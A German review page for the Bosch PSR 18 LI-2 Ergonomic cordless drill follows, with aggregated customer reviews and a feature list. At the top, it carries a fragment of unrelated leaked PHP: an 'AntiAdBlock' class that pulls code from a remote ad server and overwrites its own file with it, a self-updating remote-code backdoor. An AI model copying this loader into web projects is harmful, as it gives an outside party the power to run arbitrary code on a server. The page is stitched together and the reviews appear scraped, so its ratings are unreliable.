Bosch Akkuschrauber PSR 18 LI-2 Ergonomic – handliches Gerät, großes Koffer

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2361347(); return $__aab->get();

Ein wirklich brauchbarer schrauber, wobei form und balance eher an ein gerät von festool erinnern. Mir ist es auch unbegreiflich warum bosch so ein gerät nicht in der blauen serie anbietet. Sowohl verarbeitung als auch ausstattungsmerkmale können sich durchaus sehen lassen. Ich wage zu behaupten, die verarbeitung ist sogar besser als bei diversen blauen schraubern. Was auch schon der nächste punkt ist den vielleicht nicht nur ich nicht verstehe: immer mehr geräte der blauen serie werden in china oder malaysia produziert, wobei immer mehr qualitätseinbußen zu beobachten sind und die masse der grünen geräte wird in der eu produziert. Für mich ist es jedenfalls aktuell der einzige schrauber der grünen serie den ich auch für den anspruchsvollen gebrauch empfehlen würde.

Der akkuschrauber ist einfach super. Ausbalasierte gewicht und der akku hält ewig lange.

  • Er schraubt und schraubt!
  • Macht genau was sie soll
  • Super Qualität! Tolles Allroundwerkzeug

Der bohrschrauber wird mit ladegerät, akku und einem ziemlich großen gerätekoffer geliefert. In diesem lassen sich ein zweiter akku (nicht im lieferumfang) und einige kleinteile wie bohrer und schraubenbits unterbringen. Das gerät ist kein ausgesprochenes leichtgewicht, lässt sich aber mit dem zweiten griff sehr gut führen. Die leistung des kräftigen motors kann präzise gesteuert werden, das gerät hat daher weder probleme mit kleinen möbelschrauben, noch mit bohrungen im mauerwerk. Wird der ein-/ausschalter leicht gedrückt, geht zuerst eine ladestandanzeige und eine lampe an, die auf das bohrloch oder die schraube gerichtet ist. Die drehrichtung wird mit einem hebel geändert, der vor dem ein-/ ausschalter liegt. Zum eindrehen (rechtslauf) wird der hebel nach vorn gedrückt, zum ausdrehen (linkslauf) zieht man ihn nach hinten. Oben auf dem gerät befindet sich ein gangwahlschalter, mit dem man zwischen einem niedrigen und einem hohen drehzahlbereich und wählen kann. Im ersten bereich verfügt das gerät über mehr drehmoment und eignet sich zum arbeiten mit großen schrauben oder bohrern. Hinter dem bohrfutter befindet sich ein einstellring für die drehmomentvorwahl.

Der bosch home and garden akku-bohrschrauber psr 18 li-2 ergonomic, akku, ladegerät, schrauberbit, koffer, bürstenloser ec-motor (18 v, 2,5 ah, schrauben bis Ø 10 mm, bohr-Ø 38 mm in holz, 13 mm in stahl) wird als set in einem passenden koffer geliefert. Neben dem akku-bohrschrauber und dem koffer gibt es noch eine mehr oder weniger verständliche bedienungsanleitung, einen akku, ein schnellladegerät und einen ganzen bit dazu. Der erste eindruck: wie klein und leicht ist der denn?. Für den aufgerufenen preis erwartet man tief im hobby-handwerker-unterbewußtsein einfach mehr masse und gewicht. Dieser eindruck verfliegt im einsatz dann doch sehr schnell, denn das handling ist überaus angenehm. Auch der quasi doppelte griff, zunächst sehr ungewohnt, erweist sich als außerordentlich praktisch. In die gleiche kerbe schlägt der schalter für rechts-links-lauf. Auch hier bedarf es der eingewöhnung, doch die anbringung ist schon nicht schlecht und man kann ihn einhändig bedienen. Der akku wirkt recht klein und niedlich, vor allem auch im vergleich zu älteren modellen, doch er liefert reichlich energie. Herausragend finde ich die idee, eine ganze elektrowerkzeugserie mit universell kompatiblen akkus auszustatten.

Merkmal der Bosch Akkuschrauber PSR 18 LI-2 Ergonomic (Akku, Ladegerät, Bit, Koffer, 18 Volt System, 2,5 Ah)

  • Der Akku-Bohrschrauber PSR 18 LI-2 Ergonomic – kompakt und leicht für langes Bohren und Schrauben
  • Mit bürstenloser EC-Motor für mehr Drehmoment und Leistung bei weniger Gewicht
  • Kontrolliertes Arbeiten: Kickback Control erkennt plötzliches Blockieren und stoppt den Motor
  • Perfekte Kraftübertragung durch 20 Drehmomentstufen, Bohrstufe und 2 Gängen mit innovativem Vor-/Rückwärts-Schalter zum Bohren/Schrauben
  • Keine zusätzliche Kraftanstrengung nötig für ein langes ermüdungsfreies Arbeiten
  • Mit Lithium-Ionen-Akku und Syneon-Chip für höchste Energieeffizienz und eine hohe Langlebigkeit
  • Lieferumfang: PSR 18 LI-2 Ergonomic, Akku, Ladegerät, Schrauberbit, Koffer

Very highly recommended , such a comfortable grip, and great trigger control for tighenying screws. It’s also fairly powerful as a drill, although, not for heavy jobs.

Sehr guter akkuschrauber von bosch. Der akku hält erstaunlich lange und hat uns bei einer renovierungsaktion zuverlässig fast den ganzen tag mit strom versorgt. Die verarbeitung ist sehr gut, typisch bosch möchte man fast sagen. Der zweite griff bietet eigentlich nur vorteile. Für mich als hobbyhandwerker ein durch und durch gelungener akkuschrauber.

Stabiler akkuschrauber, dank des doppelgriffs für kleine und große hände gut zu greifen und zu bedienen. Vorwärts-/rückwärtslauf ist gut zu erreichen. Beleuchtung von unter, funktioniert auch, wenn eine hand am vorderen griff ist. Der akku lässt sich kinderleicht einklicken (vorausgesetzt, man macht es richtig herum). Der akku ist in etwa einer stunde voll geladen. Wer viel heimwerkelt, sollte sich dennoch für die variante mit zwei akkus entscheiden, da dies erheblich billiger ist, als einen akku einzeln nachzukaufen. Die akkus sollen für alle geräte der produktlinie passen. Offenbar verwendet bosch auch den koffer für verschiedene geräte, zumindest die äußere form. Innen sind die plastikstreben so angepasst, dass der schrauber, der akku und das ladegerät hineinpassen. Die übrigen seltsam geformten hohlräume sind leider zu nichts zu gebrauchen.

Unser alter 14,4v akku-schrauber von bosch hat nach fast 9 jahren den dienst quittiert und als nachfolger haben wir diesen akku-bohrschrauber psr 18 li-2 ergonomie gewählt. Der lieferumfang ist nicht wirklich aufregend, ein bosch typischer grüner werkzeugkoffer, ein akkuladegerät, der akku und eine bedienungsanleitung. Das es unser erstes litium-ionen gerät ist, waren wir von dem 18v akku sehr überrascht, welcher im gegensatz zu unserem alten 14v nimh-akkus deutlich kleiner und leichter bei gleichzeitig höherer leistung ist. Griff” ist etwas ungewohnt, aber nach einigem arbeiten dann doch sehr praktisch. Am wochenende haben wir eine gartenhütte aufgebaut, so dass der neue psr 18 li-2 gleich mal zeigen konnte, was so in ihm steckt. Zunächst war für mich beim arbeiten der “2. Handgriff” und der anders gestaltete rechts- / linkslauf gewöhnungsbedürftig – lustigerweise empfand meine frau diese Änderungen als sehr angenehm und gut zu merken. Zitat “endlich ist ein dahinter system und ich weiß ob der schrauber jetzt die schraube rein- oder herausdreht” – denn wenn der schalter nach vorne steht, symbolisiert er schraube reindrehen. Schalter nach hinten bedeutet.

Ausgeliefert wird der bosch home and garden akku-bohrschrauber psr 18 li-2 ergonomic in einem koffer, der neben dem bohrschrauber selbst noch platz für den mitgelieferten akkulader. Wie bei den günstigeren bosch-modellen findet sich auch bei diesem gerät nur ein doppelbit (kreuz/schlitz) im lieferumfang. Zusätzliche bits und bohrer muss man sich dazukaufen. Hier empfiehlt sich das bohrer- und schrauberbitset x-line von bosch. Es wäre natürlich schön gewesen, wenn dieses set direkt dabei gewesen wäre, denn so darf man noch mal rund 20 euro aufschlagen, wenn man nicht zufällig schon ein passendes sortiment an aufsätzen daheim hat. Nimmt man den akku unten ab, dann ist der psr-18 erstaunlich kompakt in den abmaßen. Er liegt ziemlich gut in der hand, besonders der gummierte griff bietet eine gute, rutschfeste fläche zur kraftübertragung. Die drei bedienelemente sind sehr gut angeordnet. Da hatte ich vor allem beim vor-/rückwärtsschalter einige bedenken, ob dieser nicht zu nah am startschalter liegt, aber dies erwies sich als unbegründet. Im einsatz erweist sich der psr 18 li-2 ergonomic als kraftvoller helfer.

Und wenn es so lange lebt wie sein bosch vorgänger bin ich absolut zufrieden.

Der akku-bohrschrauber ist sauber verarbeitet, nicht zu schwer, man kann also längere zeit damit arbeiten. Er hat einen antirutsch softgriff, so kann man ihn jederzeit gut einsetzen. Die lautstärke ist ok, er ist nicht lauter als andere akkuschrauber. Er kommt im koffer und hat auch ein ladegerät, sowie dopperschrauberbit dabei. Die ladedauer des akkus beträgt ca 40 min. Wechselakku ist leider keiner dabei, aber hier passen auch die von anderen geräten dieser marke. Er hat 20 drehmomentstufen (max. 28 nm weich/32 nm hart), bohrstufe, schnellspannfutter, natürlich auch rechts-/linkslauf, ist also wie jeder andere akkuschrauber zu bedienen. Per knopfdruck wechselt man zwischen schrauben und bohren. Bohrdurchmesser beträgt bei holz 38 mm, bei metall 13 mm, und man kann max 10 mm schraubendurchmesser eindrehen. Er hat eine ordentliche leistung und ist für hobby und auch für profis gut geeignet. Dank doppelhandgriff kann man genügend kraft einbringen um auch härtere sachen besser bohren zu können. Mehrere probebohrungen in hart-/weichholz, rigips sowie metall gelangen mühelos. Auch schrauben sind schnell und problemlos eingedreht.

Ich konnte den bosch bohr schrauber direkt in aktion testen, da wir im juli einen jungen kriegen und die frau sich eine selbstgemachte wickelauflage gewünscht hat:-)zu dem bohrschrauber. Liegt sehr gut in der hand, sehr robust (dabei angenehm leicht) gebaut und vermittelt einen den eindruck für lange zeit funktionsfähig zu bleiben. Die kraft reicht locker aus um durch dickeres/festeres holz durchzubohren. Sehr gut ist der akku vor allem weil der austausch hier kostengünstig und easy gemacht wird. Am wochenende wird ein tisch gebaut.

Mein bosch akku-bohrschrauber hat sicherlich schon 10 bis 15 jahre auf dem buckel – daher nun also ein neuer. Ehrlich gesagt, hat mich der neue griff ein wenig gestört zu beginn. Allerdings will ich ihn inzwischen nicht mehr missen. Der bohrer ist ingesamt leichter geworden – die einstellung rechts / links fand ich früher schon gut, allerdings ist es jetzt auch gut gelöst. Klar, der bohrer ersetzt einen guten (kabel-) schlagbohrer nicht, aber für sein einsatzgebiet und für den hausgebrauch ist der neue bosch home and garden ein starkes stück und eine sinnvolle evolution. Für meine zwecke nach zwei wochenenden mit diversen tests bisher überzeugte 5 / 5 – sollte sich etwas ändern, werde ich die rezension gerne ergänzen.

Geringes gewicht, starke leistung und sehr handlich. Ladezeit ist sehr schnell, unter einer stunde wartezeit. Meine erwartung hat es übertroffen.

Die maschine hat richtig power und liegt super in der hand. Schrauben bis 8*100 gehen rein wie butter.

Nachdem mein alter bosch akkuschrauben sich an einer schraube selbst zerbrochen hat achtete ich diesmal zuerst auf stabilität. Ich hab den schrauber im baumarkt angesehen, dann aber doch bei amazon gekauft weil die im baumarkt tatsächlich 229 euro dafür wollten und nicht von ihrem preis abgerückt sind. Tut mir leid für den baumarkt bei dem ich den schrauber ausgesucht hatte, aber. Mein hauptkriterium waren stabilität, kraft und handlichkeit. Mit dem zusätzlichen formteil vor dem griff dachte ich er wäre stabiler. Ist er auch, dafür hat er nicht mehr ganz so viel kraft. Überhaupt scheint bosch mit der “ergonomie” baureihen in vielen sachen eher daneben zu greifen. Also nichts gegen den akkuschrauber. Der ist gut und ich behalte ihn, aber. ) man kommt ständig an den umschalthebel beim schrauben und verstellt die versehentlich drehrichtung. Wie idiotisch diesen hebel nicht mehr von links nach rechts logisch zu schalten wir früher – sondern von vorne nach hinten. ) schraubt man auf sehr engem raum kommt man natürich mit dem gehäuse mit dem drumherum in berührung und verstellt sich die kraft. Auch das ist einfach nur blöd.

Für eine handwerkliche aufgabe, die viele schrauben aber auch einige bohrungen beinhaltete, habe ich mir diesen akkuschrauber gekauft. Es waren aber für dieses gerät nicht genug schrauben und bohrungen. Ich habe nicht mal einen akku leer bekommen. Bohrerwechsel geht leicht und schnell ohne weitere hilfsmittel vonstatten. Die bits aber auch bohrer sitzen fest beim arbeiten. Die akkus werden auch in einer akku-handkreissäge oder einem akku-multifunktionswerkzeug verwendet. Für meine gelegentlichen heimwerkerarbeiten ist das genau das richtige werkzeug.

Habe mir den akkuschrauber bestellt weil ich schon andere geräte aus der 18 volt li serie habe. Kann nur sagen:bärenstark und ausdauernd.

Ich habe meine hobby werkstatt mit einem akku-schrauber ergänzt. Und ich muss sagen, das passt. Habe schon eine stichsäge und eine säbelsäge von bosch alles mit den älteren akku`s und bin voll zufrieden damit. Natürlich gibt es es bosch blau, makita und co für mehr geld, aber hier stimmt der preis/leistung verhältnis.

Besten Bosch Akkuschrauber PSR 18 LI-2 Ergonomic (Akku, Ladegerät, Bit, Koffer, 18 Volt System, 2,5 Ah) Einkaufsführer

Summary
Review Date
Reviewed Item
Bosch Akkuschrauber PSR 18 LI-2 Ergonomic (Akku, Ladegerät, Bit, Koffer, 18 Volt System, 2,5 Ah)
Rating
5,0 of 5 stars, based on 20 reviews